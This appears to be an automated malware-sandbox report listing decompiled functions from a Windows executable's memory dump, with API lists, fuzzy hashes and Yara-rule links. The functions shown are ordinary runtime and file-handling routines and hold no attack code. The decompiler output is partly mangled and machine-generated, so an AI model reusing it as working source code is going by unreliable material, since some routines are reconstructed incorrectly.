Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 40dba7af1196ca0ec8f421c962501712d605065fefd24e881491c147ca0c1fc0
Instruction ID: b5c43bcdd1a658e35f9e92b7b9bbdcc4a70fa64995374f80ecf9b61b969fb81d
Opcode Fuzzy Hash: 40dba7af1196ca0ec8f421c962501712d605065fefd24e881491c147ca0c1fc0
Instruction Fuzzy Hash: 5621D331268286AFC710DE64D891AABBBE8BF55304F04091DB8C4C7141DB35EDDCCBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00289990, Relevance: 3.1, APIs: 2, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00289990(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0x2c07b8 + _a4 * 4;
				_t27 =  *0x29d668; // 0xd26a0a57
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0x29d668; // 0xd26a0a57
							goto L13;
						}
						 *_t20 = E0027DB10(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00289A2C( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0x29d668; // 0xd26a0a57
						goto L7;
					}
					_t27 =  *0x29d668; // 0xd26a0a57
					goto L8;
				}
				L2:
				return _t33;
			}

0x0028999b
0x002899a4
0x002899aa
0x002899b4
0x002899b6
0x002899ba
0x00289a25
0x00000000
0x00289a25
0x002899be
0x002899c4
0x002899ca
0x002899e6
0x002899e6
0x002899e8
0x002899ea
0x00289a15
0x00289a17
0x00289a1f
0x00289a23
0x00000000
0x00289a23
0x002899f6
0x002899fa
0x00289a0f
0x00000000
0x00289a0f
0x00289a03
0x00000000
0x00000000
0x00000000
0x00000000
0x002899cc
0x002899cc
0x002899ce
0x002899d6
0x00000000
0x00000000
0x002899d8
0x002899de
0x00000000
0x00000000
0x002899e0
0x00000000
0x002899e0
0x00289a07
0x00000000
0x00289a07
0x002899c0
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00289BD0,00000006,FlsSetValue,00296058,00296060,00000000,00000364,?,002885E8,00000000), ref: 002899F0
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 002899FD

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 0f68b8f260e60c61877251c4698b75c8652ea3e9fbe6d8516fc3a9d4f82e2ec1
Instruction ID: 1c10796862b2354217a3bdad2711ebed3cb94a816ae800335e9156b78c1551bc
Opcode Fuzzy Hash: 0f68b8f260e60c61877251c4698b75c8652ea3e9fbe6d8516fc3a9d4f82e2ec1
Instruction Fuzzy Hash: 5A112C3FA22122DF9F25EE28FC4487A73999B8432471A4121FC19EB2C4D631ECA1C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00269903, Relevance: 3.1, APIs: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00269903(intOrPtr* __ecx, long _a4, long _a8, long _a12) {
				long _t14;
				void* _t17;
				intOrPtr* _t19;
				long _t21;
				void* _t23;
				long _t25;
				long _t28;
				long _t31;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
					L13:
					return 1;
				}
				_t28 = _a4;
				_t25 = _a8;
				_t31 = _t25;
				if(_t31 > 0 || _t31 >= 0 && _t28 >= 0) {
					_t21 = _a12;
				} else {
					_t21 = _a12;
					if(_t21 != 0) {
						if(_t21 != 1) {
							_t17 = E002696E1(_t23);
						} else {
							_t17 =  *((intOrPtr*)( *_t19 + 0x14))();
						}
						_t28 = _t28 + _t17;
						asm("adc edi, edx");
						_t21 = 0;
					}
				}
				_a12 = _t25;
				_t14 = SetFilePointer( *(_t19 + 4), _t28,  &_a12, _t21); // executed
				if(_t14 != 0xffffffff || GetLastError() == 0) {
					goto L13;
				} else {
					return 0;
				}
			}

0x00269907
0x0026990d
0x00269972
0x00000000
0x00269972
0x00269910
0x00269914
0x00269917
0x00269919
0x00269943
0x00269921
0x00269921
0x00269926
0x0026992d
0x00269936
0x0026992f
0x00269931
0x00269931
0x0026993b
0x0026993d
0x0026993f
0x0026993f
0x00269926
0x00269948
0x00269957
0x00269962
0x00000000
0x0026996e
0x00000000
0x0026996e

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 00269957
GetLastError.KERNEL32 ref: 00269964

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 4f8423b182ba76e9a26802189bad168256589c919e0d3797ee3f41e9326ccd0e
Instruction ID: 22d33aaa823bb59dce689b21443a286daccce62822e1d12b146c8c30f014bbc2
Opcode Fuzzy Hash: 4f8423b182ba76e9a26802189bad168256589c919e0d3797ee3f41e9326ccd0e
Instruction Fuzzy Hash: D001D8322362029B8F188E269C84ABE775DAF52730705461DE926CB251DF71DCF5D660

Uniqueness

Uniqueness Score: -1.00%

Function 00267ADF, Relevance: 3.0, APIs: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00267ADF(signed int* __ecx, void* __edx, void* __eflags) {
				void* __esi;
				signed int _t23;
				signed int _t24;
				signed int* _t28;
				signed int* _t30;
				void* _t36;
				signed int _t38;
				signed int* _t41;
				void* _t43;
				void* _t46;

				_t46 = __eflags;
				_t36 = __edx;
				_t30 = __ecx;
				E0027D870(E002912BD, _t43);
				_push(_t30);
				_t41 = _t30;
				 *(_t43 - 0x10) = _t41;
				 *_t41 =  *_t41 & 0x00000000;
				_t28 =  &(_t41[4]);
				_t41[1] = _t41[1] & 0x00000000;
				E0026C4CA(_t28, _t36, _t46);
				_t38 =  *(_t43 + 8);
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t41[2] = _t38;
				_t41[0x3d] = 0;
				_t41[0x43d] = 0;
				_t41[0x39] = _t41[0x39] & 0;
				_t23 = E0027D82C(_t36, _t41, _t46, 0xe6e0); // executed
				 *(_t43 + 8) = _t23;
				 *(_t43 - 4) = 1;
				_t47 = _t23;
				if(_t23 == 0) {
					_t24 = 0;
					__eflags = 0;
				} else {
					_push(_t28);
					_t24 = E002714DE(_t23, _t47);
				}
				_t41[0x38] = _t24;
				_push( *((intOrPtr*)(_t38 + 0x82d8)));
				 *(_t43 - 4) = 0;
				E00274033(_t24, _t36);
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t41;
			}

0x00267adf
0x00267adf
0x00267adf
0x00267ae4
0x00267ae9
0x00267aec
0x00267aee
0x00267af2
0x00267af5
0x00267af8
0x00267afe
0x00267b03
0x00267b08
0x00267b0c
0x00267b0f
0x00267b16
0x00267b1d
0x00267b28
0x00267b2e
0x00267b31
0x00267b35
0x00267b37
0x00267b43
0x00267b43
0x00267b39
0x00267b39
0x00267b3c
0x00267b3c
0x00267b45
0x00267b4d
0x00267b53
0x00267b57
0x00267b64
0x00267b6e

APIs

__EH_prolog.LIBCMT ref: 00267AE4

Part of subcall function 0026C4CA: __EH_prolog.LIBCMT ref: 0026C4CF
Part of subcall function 0026C4CA: new.LIBCMT ref: 0026C512
Part of subcall function 0026C4CA: new.LIBCMT ref: 0026C536

new.LIBCMT ref: 00267B28

Part of subcall function 002714DE: __EH_prolog.LIBCMT ref: 002714E3

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9bc9a27cead95b301275b77a972d1f42de9d3db6d4ffccff5788164dd2d53fed
Instruction ID: c751ffa2c32a6b50e7fc2af023368f22e09714103f868a0335720de22b5a4fe3
Opcode Fuzzy Hash: 9bc9a27cead95b301275b77a972d1f42de9d3db6d4ffccff5788164dd2d53fed
Instruction Fuzzy Hash: 6901AD31A247459BDB14DFB8D4017ABF7F4EF04365F00893EE45AD3240E7B459508BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00287B78, Relevance: 3.0, APIs: 2, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00287B78(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = RtlReAllocateHeap( *0x2c0874, 0, _t14, _t16); // executed
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00287906();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00286763(_t10, _t13, _t16, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00287ECC())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00287A50(_t14);
					goto L6;
				}
				_t9 = E00287A8A(__ecx, _a8); // executed
				return _t9;
			}

0x00287b78
0x00287b78
0x00287b7e
0x00287b83
0x00287b91
0x00287b94
0x00287b96
0x00287ba1
0x00287ba4
0x00287bcb
0x00287bd5
0x00287bdb
0x00287bdd
0x00000000
0x00000000
0x00287bbc
0x00287bbe
0x00000000
0x00000000
0x00287bc1
0x00287bc6
0x00287bc7
0x00287bc9
0x00000000
0x00000000
0x00287bc9
0x00287bb3
0x00000000
0x00287bb3
0x00287ba6
0x00287bab
0x00287bb1
0x00287bb1
0x00287bb1
0x00000000
0x00287bb1
0x00287b99
0x00000000
0x00287b9e
0x00287b88
0x00000000

APIs

_free.LIBCMT ref: 00287B99

Part of subcall function 00287A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00282FA6,?,0000015D,?,?,?,?,00284482,000000FF,00000000,?,?), ref: 00287ABC

RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,002A00E0,0026CB18,?,?,?,?,?,?), ref: 00287BD5

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap$_free
String ID:
API String ID: 1482568997-0
Opcode ID: 94bdf68312072f9aaf13a6a85b5fa5b0b3e2a86e04facfb860ed0d26677e44a3
Instruction ID: 8fb3266322c8182b584947be1b42593abab34f4d71fab5e07920ee53ffbe33a2
Opcode Fuzzy Hash: 94bdf68312072f9aaf13a6a85b5fa5b0b3e2a86e04facfb860ed0d26677e44a3
Instruction Fuzzy Hash: CBF0C23953B106AADB213E25AC45F6F775A9F827B8B340156FC28A60D0DB30D83097A1

Uniqueness

Uniqueness Score: -1.00%

Function 00270574, Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00270574(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 == 0) {
					return _t8 + 1;
				}
				_t14 = 0;
				_t17 = _v8;
				_t15 = 1;
				do {
					if((_t17 & _t15) != 0) {
						_t14 = _t14 + 1;
					}
					_t15 = _t15 + _t15;
				} while (_t15 != 0);
				if(_t14 >= 1) {
					return _t14;
				}
				return 1;
			}

0x00270588
0x00270590
0x00000000
0x00270592
0x00270597
0x0027059b
0x0027059e
0x002705a0
0x002705a2
0x002705a4
0x002705a4
0x002705a5
0x002705a5
0x002705ac
0x00000000
0x002705ae
0x002705b3

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00270581
GetProcessAffinityMask.KERNEL32(00000000), ref: 00270588

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: ea38cb202ccc1967908b599808e9b185b697dceb389e472c4a1c6f33c791192e
Instruction ID: b43139d73955acff7202517f8cd1fad5fae033944e90dcc1693a6f47a5963138
Opcode Fuzzy Hash: ea38cb202ccc1967908b599808e9b185b697dceb389e472c4a1c6f33c791192e
Instruction Fuzzy Hash: 22E09B72E30106F75F148AA59C458AB779DF658301B50917EA90AD3300F934DD194BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00286F6D, Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00286F6D(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x00286f72

APIs

Part of subcall function 0028ABA6: GetEnvironmentStringsW.KERNEL32 ref: 0028ABAF
Part of subcall function 0028ABA6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0028ABD2
Part of subcall function 0028ABA6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0028ABF8
Part of subcall function 0028ABA6: _free.LIBCMT ref: 0028AC0B
Part of subcall function 0028ABA6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0028AC1A

_free.LIBCMT ref: 00286FB3
_free.LIBCMT ref: 00286FBA

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 400815659-0
Opcode ID: 38724e798fe01b422513fac11c70b35e02b7fc3474c64421f304d82409568980
Instruction ID: fb664803d8978efa0658924db8713b7e948a72bd56d5951f5e0973721cb3c84e
Opcode Fuzzy Hash: 38724e798fe01b422513fac11c70b35e02b7fc3474c64421f304d82409568980
Instruction Fuzzy Hash: 10E02B2E53B8924AE62532793C99B3F15454BE1334F21135BFA22D74C3DD54C9730B96

Uniqueness

Uniqueness Score: -1.00%

Function 0026A12F, Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0026A12F(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t12;
				signed int _t18;
				signed int _t19;

				E0027D940();
				_push(_t18);
				_t12 = SetFileAttributesW(_a4, _a8); // executed
				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
				if(_t19 == 0 && E0026B32C(_a4,  &_v4100, 0x800) != 0) {
					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t19;
			}

0x0026a137
0x0026a13c
0x0026a143
0x0026a14b
0x0026a150
0x0026a17c
0x0026a17c
0x0026a185

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00269F65,?,?,?,00269DFE,?,00000001,00000000,?,?), ref: 0026A143
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00269F65,?,?,?,00269DFE,?,00000001,00000000,?,?), ref: 0026A174

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7e714879b468e999d8f699f09ef2fb0e4221479d8fe9ab281e820cec07f5ade6
Instruction ID: e17fa76063b1d1b5c059881d295e0bc40c79287f62cda3f44fa10ac68721b841
Opcode Fuzzy Hash: 7e714879b468e999d8f699f09ef2fb0e4221479d8fe9ab281e820cec07f5ade6
Instruction Fuzzy Hash: 45F0A03115010ABBDF025F61DC45FEA376CAF14381F448091BC8C96160DB32D9E9EE90

Uniqueness

Uniqueness Score: -1.00%

Function 0027CB57, Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0027CB85
SetDlgItemTextW.USER32(00000065,?), ref: 0027CB9C

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 73db02a4072b4c6438cca37322b534a69a89576b55c0a8a998f0bbce37fae593
Instruction ID: d3d0fddaaa45144937b8380f25913953f4dd415cc7913fa7becb85c0eb559d41
Opcode Fuzzy Hash: 73db02a4072b4c6438cca37322b534a69a89576b55c0a8a998f0bbce37fae593
Instruction Fuzzy Hash: F4F0EC3192834867DB11EFB0AC07F993B1C9B05741F544496FE09520A2D9716A704B71

Uniqueness

Uniqueness Score: -1.00%

Function 00269E18, Relevance: 3.0, APIs: 2, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00269E18(WCHAR* _a4) {
				short _v4100;
				int _t10;
				signed int _t16;
				signed int _t17;

				E0027D940();
				_push(_t16);
				_t10 = DeleteFileW(_a4); // executed
				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
				if(_t17 == 0 && E0026B32C(_a4,  &_v4100, 0x800) != 0) {
					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t17;
			}

0x00269e20
0x00269e25
0x00269e29
0x00269e31
0x00269e36
0x00269e5f
0x00269e5f
0x00269e68

APIs

DeleteFileW.KERNELBASE(?,?,?,00269648,?,?,002694A3), ref: 00269E29
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00269648,?,?,002694A3), ref: 00269E57

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: e5652d262928643a6bce72f9c68931aaf28da189adb34dfc60d170cdcc45ad4d
Instruction ID: ea7e45d29e208a7e1d749ddb921b746edb3f0f573bea9e6f1c8c9f08a5a88409
Opcode Fuzzy Hash: e5652d262928643a6bce72f9c68931aaf28da189adb34dfc60d170cdcc45ad4d
Instruction Fuzzy Hash: 58E09231651209ABDB019F60EC45FEA776CAF18381F884063B988D2151DF72DDE9EAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00269E7F, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00269E7F(WCHAR* _a4) {
				short _v4100;
				long _t6;
				long _t11;
				long _t13;

				E0027D940();
				_t6 = GetFileAttributesW(_a4); // executed
				_t13 = _t6;
				if(_t13 == 0xffffffff && E0026B32C(_a4,  &_v4100, 0x800) != 0) {
					_t11 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t11;
				}
				return _t13;
			}

0x00269e87
0x00269e90
0x00269e96
0x00269e9b
0x00269ebc
0x00269ec2
0x00269ec2
0x00269eca

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00269E74,?,002674F7,?,?,?,?), ref: 00269E90
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00269E74,?,002674F7,?,?,?,?), ref: 00269EBC

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 0eb89cdad0d2360e8c2f04db14dcb4074d69dc99b87817e2e2d0e53bb5668a7c
Instruction ID: fb541e69b37ccc072948e9146e193bfb0b1d3d4df0e88c362514821c526514fe
Opcode Fuzzy Hash: 0eb89cdad0d2360e8c2f04db14dcb4074d69dc99b87817e2e2d0e53bb5668a7c
Instruction Fuzzy Hash: 50E01B31510118E7CB11AB65DC05BD9775C9B183E1F4441A3FD58D3291DB719DE5CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 0026FCFD, Relevance: 3.0, APIs: 2, Instructions: 25
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0026FCFD(intOrPtr _a4) {
				short _v4100;
				struct HINSTANCE__* _t7;

				E0027D940();
				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
				if(_t7 != 0) {
					E0026B625( &_v4100, _a4,  &_v4100, 0x800);
					_t7 = LoadLibraryW( &_v4100); // executed
				}
				return _t7;
			}

0x0026fd05
0x0026fd18
0x0026fd20
0x0026fd2e
0x0026fd3a
0x0026fd3a
0x0026fd44

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0026FD18
LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,0026E7F6,Crypt32.dll,?,0026E878,?,0026E85C,?,?,?,?), ref: 0026FD3A

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: ac574e9cc3e7a19a934244df59623053f89ffed5f36da839d90cc152d6eacac2
Instruction ID: 700dec8245719852aa87f918012e77b1cbf32e6f8ffdbeefbb381ca4abf0ad69
Opcode Fuzzy Hash: ac574e9cc3e7a19a934244df59623053f89ffed5f36da839d90cc152d6eacac2
Instruction Fuzzy Hash: 26E0127691111CAADB119A95EC0CFEA776CEF18391F4440A6BA48D2004DA74E994CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0027938E, Relevance: 3.0, APIs: 2, Instructions: 24
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0027938E(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0x293398;
				if(_a8 == 0) {
					L0027D80E(); // executed
				} else {
					L0027D814();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}

0x00279391
0x00279393
0x00279395
0x00279398
0x0027939b
0x002793a3
0x002793a4
0x002793a7
0x002793ad
0x002793b6
0x002793af
0x002793af
0x002793af
0x002793bb
0x002793c1
0x002793ca

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 002793AF
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 002793B6

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 824c7daf64dac75331c92b5c3b4cff5a29f751c00060ca0bc4ce68d9a61b48ef
Instruction ID: c928a9254c96d2a00b02e1e65730422594093ce74f20b4384038476c9177a42d
Opcode Fuzzy Hash: 824c7daf64dac75331c92b5c3b4cff5a29f751c00060ca0bc4ce68d9a61b48ef
